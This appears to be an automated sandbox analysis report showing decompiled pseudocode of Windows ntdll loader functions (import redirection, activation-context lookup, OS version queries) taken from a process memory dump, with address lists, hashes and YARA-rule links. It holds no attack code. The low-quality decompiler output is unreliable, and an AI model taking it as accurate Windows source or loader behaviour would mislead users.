				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E1D854B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x1d8c6714; // 0x0
				_v16 = _t68;
				_t69 =  *0x1d8c6710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x1d8c6710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E1D854528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E1D854528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x1d8c5ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x1d8c37c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x1d8c37c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E1D84E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x1d8c91e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}


























                                                                            0x1d8543e2
                                                                            0x1d8543e5
                                                                            0x1d8543e7
                                                                            0x1d8543f3
                                                                            0x1d8543fa
                                                                            0x1d854401
                                                                            0x1d85440b
                                                                            0x1d85440f
                                                                            0x1d854414
                                                                            0x1d854418
                                                                            0x1d854420
                                                                            0x1d854424
                                                                            0x1d85442e
                                                                            0x1d85442e
                                                                            0x1d854426
                                                                            0x1d854426
                                                                            0x1d854426
                                                                            0x1d854424
                                                                            0x1d854433
                                                                            0x1d85445e
                                                                            0x1d854443
                                                                            0x1d854445
                                                                            0x1d85444b
                                                                            0x00000000
                                                                            0x1d8544c0
                                                                            0x1d85446a
                                                                            0x1d85446f
                                                                            0x1d854471
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d854473
                                                                            0x1d854479
                                                                            0x1d85447b
                                                                            0x1d8544d4
                                                                            0x1d8544d4
                                                                            0x1d8544db
                                                                            0x1d8544de
                                                                            0x1d8544e6
                                                                            0x1d8544e9
                                                                            0x1d8544ef
                                                                            0x1d8544f9
                                                                            0x1d8544fc
                                                                            0x1d8544ff
                                                                            0x1d854502
                                                                            0x1d85451e
                                                                            0x1d854523
                                                                            0x1d8544c9
                                                                            0x1d8544d1
                                                                            0x1d8544d1
                                                                            0x1d854489
                                                                            0x1d85448f
                                                                            0x1d854491
                                                                            0x1d854493
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d854495
                                                                            0x1d854498
                                                                            0x1d85449a
                                                                            0x1d85449c
                                                                            0x1d8544b8
                                                                            0x1d8544bb
                                                                            0x1d8544bb
                                                                            0x1d8544be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8544b2
                                                                            0x1d8544b4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8544b6
                                                                            0x1d8544b6
                                                                            0x00000000
                                                                            0x1d8544b8
                                                                            0x1d85449e
                                                                            0x1d8544a0
                                                                            0x1d8544a2
                                                                            0x1d8544a4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8544a6
                                                                            0x1d8544a6
                                                                            0x1d8544a6
                                                                            0x1d8544a8
                                                                            0x1d8544aa
                                                                            0x1d8544ac
                                                                            0x1d8544ac
                                                                            0x1d8544b0
                                                                            0x1d8544c4
                                                                            0x00000000
                                                                            0x1d8544c4
                                                                            0x1d85444d
                                                                            0x1d854450
                                                                            0x1d854450
                                                                            0x1d854452
                                                                            0x1d85445c
                                                                            0x1d85445c
                                                                            0x00000000
                                                                            0x1d85445c
                                                                            0x1d854454
                                                                            0x1d854456
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d854458
                                                                            0x00000000
                                                                            0x1d854458
                                                                            0x1d854447
                                                                            0x00000000
                                                                            0x1d854447
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            • LdrpCheckRedirection, xrefs: 1D85450F
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 1D854519
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D854508
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 3446177414-3154609507
                                                                            • Opcode ID: f0814657ee4adc811478e8eb9267856275e829f606a45bb10a5eddaa0ab6cb67
                                                                            • Instruction ID: e8b266b47f83d19a8311e26dc2d0f3acde262d7646bbdf29f494097cd269b1b7
                                                                            • Opcode Fuzzy Hash: f0814657ee4adc811478e8eb9267856275e829f606a45bb10a5eddaa0ab6cb67
                                                                            • Instruction Fuzzy Hash: CD41B172746621DFCB11CF5CC940E667BE4BF88A50F0646AAFD9897265D731E800CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D8AA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 9290e77d9c1d9cfa213a643d8559ca37f309619800b8c8e11be4c6f2129aa0c6
                                                                            • Instruction ID: 0d0fffe70314c9336578ccbb030510b294563b69af1a4453ca6e7583251b08f9
                                                                            • Opcode Fuzzy Hash: 9290e77d9c1d9cfa213a643d8559ca37f309619800b8c8e11be4c6f2129aa0c6
                                                                            • Instruction Fuzzy Hash: 4F515B35700A26EFDB09CF18C8D5A2AB7E1FB89710B11416DE90AD7B10DB75EC41CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D807A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 29%
                                                                            			E1D807A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x1d8ac840);
				E1D827BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x1d8c5a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x1d8c91e0();
					E1D80B490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x1d8c5d38; // 0xb517a9a0
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x1d8c65fc; // 0x1d0dba41
					if(__eflags == 0) {
						_push(0);
						_push(4);
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E1D812B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E1D828AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x1d8c65fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x1d8c65fc; // 0x1d0dba41
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E1D888890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x1d7a50b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x1d8c91e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x1d8c91e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}











                                                                            0x1d807a4f
                                                                            0x1d807a4f
                                                                            0x1d807a4f
                                                                            0x1d807a51
                                                                            0x1d807a56
                                                                            0x1d807a5b
                                                                            0x1d807a5d
                                                                            0x1d807a61
                                                                            0x1d807a67
                                                                            0x1d807a6a
                                                                            0x1d8447f8
                                                                            0x1d844801
                                                                            0x1d844806
                                                                            0x1d84480d
                                                                            0x1d844810
                                                                            0x1d844813
                                                                            0x1d844818
                                                                            0x1d84481d
                                                                            0x1d844823
                                                                            0x1d844825
                                                                            0x1d844826
                                                                            0x1d84482b
                                                                            0x1d84482c
                                                                            0x1d84482e
                                                                            0x1d844835
                                                                            0x1d844838
                                                                            0x1d84483b
                                                                            0x1d844840
                                                                            0x1d844840
                                                                            0x1d844848
                                                                            0x1d844848
                                                                            0x1d84484d
                                                                            0x1d844852
                                                                            0x1d84485b
                                                                            0x1d844863
                                                                            0x1d844865
                                                                            0x1d84486b
                                                                            0x1d84486b
                                                                            0x1d84486e
                                                                            0x1d844871
                                                                            0x1d844892
                                                                            0x1d844895
                                                                            0x1d844873
                                                                            0x1d84487b
                                                                            0x1d844881
                                                                            0x1d844881
                                                                            0x1d844898
                                                                            0x1d84489e
                                                                            0x1d807a70
                                                                            0x1d807a72
                                                                            0x1d807a7c
                                                                            0x1d8448ac
                                                                            0x1d8448b6
                                                                            0x1d8448c2
                                                                            0x1d8448c2

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                            • String ID:
                                                                            • API String ID: 4281723722-0
                                                                            • Opcode ID: 8bfe11fd75103dff1a50220738d4982e1b74df40846f81f64b558f9c6b4763a3
                                                                            • Instruction ID: 3715d0adc553fdbdb34e0e45efbbb9c1f8e46c4ef802c15955e5c43daf1328d3
                                                                            • Opcode Fuzzy Hash: 8bfe11fd75103dff1a50220738d4982e1b74df40846f81f64b558f9c6b4763a3
                                                                            • Instruction Fuzzy Hash: 09310F75E00228DFCF05DFA9D885B9EBBB0AB4C760F21816AE511B7290DB34A900CF52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D804B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 50%
                                                                            			E1D804B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x1d8cb370 ^ _t114;
				_v8 =  *0x1d8cb370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E1D814B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E1D828A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E1D828A60(_t99, _t107);
							_t99 = _v96;
						}
						_t9 = _t111 + 0x18; // 0x1c
						_t72 = _t9;
						if(_t99 < _t9) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x1d8c65e4; // 0x76f9f0e0
															 *0x1d8c91e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E1D7D26A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x1d8c37c0 & 0x00000003) != 0) {
																		E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x1d8c37c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x1d8c37c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}





























                                                                            0x1d804b79
                                                                            0x1d804b86
                                                                            0x1d804b88
                                                                            0x1d804b8e
                                                                            0x1d804b90
                                                                            0x1d804b93
                                                                            0x1d804b97
                                                                            0x1d804c27
                                                                            0x1d804c35
                                                                            0x1d804ba7
                                                                            0x1d804ba7
                                                                            0x1d804baa
                                                                            0x1d804bac
                                                                            0x1d804bb2
                                                                            0x1d804bb2
                                                                            0x1d804bb5
                                                                            0x1d804bbc
                                                                            0x1d84330f
                                                                            0x1d843316
                                                                            0x1d843317
                                                                            0x1d84331e
                                                                            0x1d843321
                                                                            0x1d843324
                                                                            0x1d843327
                                                                            0x1d84332a
                                                                            0x1d843331
                                                                            0x1d843334
                                                                            0x1d843339
                                                                            0x1d84333e
                                                                            0x1d84333e
                                                                            0x1d804bca
                                                                            0x1d843344
                                                                            0x1d84334b
                                                                            0x1d84334c
                                                                            0x1d843353
                                                                            0x1d843356
                                                                            0x1d84335d
                                                                            0x1d843360
                                                                            0x1d843363
                                                                            0x1d84336a
                                                                            0x1d84336d
                                                                            0x1d843372
                                                                            0x1d843372
                                                                            0x1d804bd0
                                                                            0x1d804bd0
                                                                            0x1d804bd5
                                                                            0x1d804c36
                                                                            0x1d804c36
                                                                            0x00000000
                                                                            0x1d804bd7
                                                                            0x1d804bd7
                                                                            0x1d804bd7
                                                                            0x1d804bdf
                                                                            0x00000000
                                                                            0x1d804be1
                                                                            0x1d804be3
                                                                            0x1d804bec
                                                                            0x1d804bef
                                                                            0x1d804bf0
                                                                            0x1d804bf9
                                                                            0x1d804bfd
                                                                            0x1d804bff
                                                                            0x1d804c04
                                                                            0x1d804c06
                                                                            0x1d804c07
                                                                            0x1d804c0a
                                                                            0x1d804c0c
                                                                            0x1d804c0f
                                                                            0x1d804c1a
                                                                            0x1d804c1c
                                                                            0x1d804c21
                                                                            0x1d84337a
                                                                            0x1d84337a
                                                                            0x1d84337d
                                                                            0x1d84337d
                                                                            0x1d843384
                                                                            0x00000000
                                                                            0x1d843386
                                                                            0x1d843386
                                                                            0x1d84338b
                                                                            0x1d8433b2
                                                                            0x1d8433b5
                                                                            0x1d8433b9
                                                                            0x1d8433be
                                                                            0x1d8433f7
                                                                            0x1d8433f7
                                                                            0x1d804c76
                                                                            0x1d804c84
                                                                            0x1d804c8c
                                                                            0x1d804c90
                                                                            0x1d804ca9
                                                                            0x1d804ca9
                                                                            0x1d804cae
                                                                            0x1d804ce4
                                                                            0x1d804cee
                                                                            0x1d804cf3
                                                                            0x1d804cf3
                                                                            0x1d804ce6
                                                                            0x1d804ce6
                                                                            0x1d804cb2
                                                                            0x1d843463
                                                                            0x1d84347b
                                                                            0x1d843480
                                                                            0x1d84348a
                                                                            0x1d843490
                                                                            0x1d843490
                                                                            0x1d84348a
                                                                            0x1d804cbe
                                                                            0x1d804c92
                                                                            0x1d804c98
                                                                            0x1d804cc5
                                                                            0x00000000
                                                                            0x1d843423
                                                                            0x1d843429
                                                                            0x00000000
                                                                            0x1d84342f
                                                                            0x00000000
                                                                            0x1d84342f
                                                                            0x1d843429
                                                                            0x00000000
                                                                            0x1d804c9a
                                                                            0x1d804c9a
                                                                            0x1d804ca1
                                                                            0x1d843434
                                                                            0x1d843435
                                                                            0x1d84344f
                                                                            0x1d843454
                                                                            0x1d843454
                                                                            0x1d804ca7
                                                                            0x1d804ca7
                                                                            0x00000000
                                                                            0x1d804c98
                                                                            0x1d843391
                                                                            0x1d843398
                                                                            0x1d84339c
                                                                            0x1d8433a2
                                                                            0x00000000
                                                                            0x1d8433a2
                                                                            0x1d84338b
                                                                            0x00000000
                                                                            0x1d8433a7
                                                                            0x1d8433a7
                                                                            0x1d8433a9
                                                                            0x1d8433ad
                                                                            0x1d804c21
                                                                            0x1d804c1a
                                                                            0x1d804c04
                                                                            0x00000000
                                                                            0x1d804bfd
                                                                            0x1d804bdf
                                                                            0x00000000
                                                                            0x1d804bd5
                                                                            0x00000000
                                                                            0x1d804bac
                                                                            0x00000000

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$Flst
                                                                            • API String ID: 0-758220159
                                                                            • Opcode ID: b2925e95286255e0fc20d3b2d6cfa6a5c700c26900eeb3561646f722f4521067
                                                                            • Instruction ID: d0e735231799c211d633c8d0fea366b830a7a91c94e10d83c2b94804be2dfb18
                                                                            • Opcode Fuzzy Hash: b2925e95286255e0fc20d3b2d6cfa6a5c700c26900eeb3561646f722f4521067
                                                                            • Instruction Fuzzy Hash: 28519AB1E40699DFDB15CF9CC9847A9FBF4EF44719F25C02AE0499B250E7B09981CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7D0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 66%
                                                                            			E1D7D0485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x1d8c6630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E1D7D82E0(0xabababab, 0, "kLsE", 0);
					 *0x1d8c6630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E1D7F5C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E1D7D0670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E1D7D0670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E1D7D0630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E1D815050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E1D813EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E1D7D0690) {
					 *0x1d8c91e0();
					_t50 =  *_t73();
				} else {
					_t50 = E1D7D0690();
				}
				_t84 = _t50;
				goto L4;
			}


















                                                                            0x1d7d048f
                                                                            0x1d7d0493
                                                                            0x1d7d049a
                                                                            0x1d7d04a0
                                                                            0x1d7d04a3
                                                                            0x1d7d04a6
                                                                            0x1d7d04af
                                                                            0x1d7d04b8
                                                                            0x1d7d04c2
                                                                            0x1d7d04cb
                                                                            0x1d7d04ce
                                                                            0x1d7d04d2
                                                                            0x1d7d04d6
                                                                            0x1d7d060e
                                                                            0x1d7d0610
                                                                            0x1d7d0618
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7d04ef
                                                                            0x1d7d04ef
                                                                            0x1d7d04f2
                                                                            0x1d7d05e3
                                                                            0x1d7d05ea
                                                                            0x1d7d05f1
                                                                            0x1d7d05f1
                                                                            0x1d7d0501
                                                                            0x1d7d0501
                                                                            0x1d7d0504
                                                                            0x1d7d050c
                                                                            0x1d7d0519
                                                                            0x1d7d051b
                                                                            0x00000000
                                                                            0x1d82e99c
                                                                            0x1d82e9a2
                                                                            0x1d82e9ac
                                                                            0x1d7d051f
                                                                            0x1d7d052a
                                                                            0x1d82e9b9
                                                                            0x1d7d05cd
                                                                            0x1d7d05d3
                                                                            0x1d7d05d3
                                                                            0x1d82e9bf
                                                                            0x1d7d053c
                                                                            0x1d7d054d
                                                                            0x1d7d0559
                                                                            0x1d7d0562
                                                                            0x1d82e9ce
                                                                            0x1d82e9ce
                                                                            0x1d7d056a
                                                                            0x1d7d057b
                                                                            0x1d7d0580
                                                                            0x1d7d0580
                                                                            0x1d7d058f
                                                                            0x1d7d0597
                                                                            0x1d7d0598
                                                                            0x1d7d059d
                                                                            0x1d7d05a1
                                                                            0x1d7d05a5
                                                                            0x1d7d05ad
                                                                            0x1d7d05b3
                                                                            0x1d82e9dd
                                                                            0x00000000
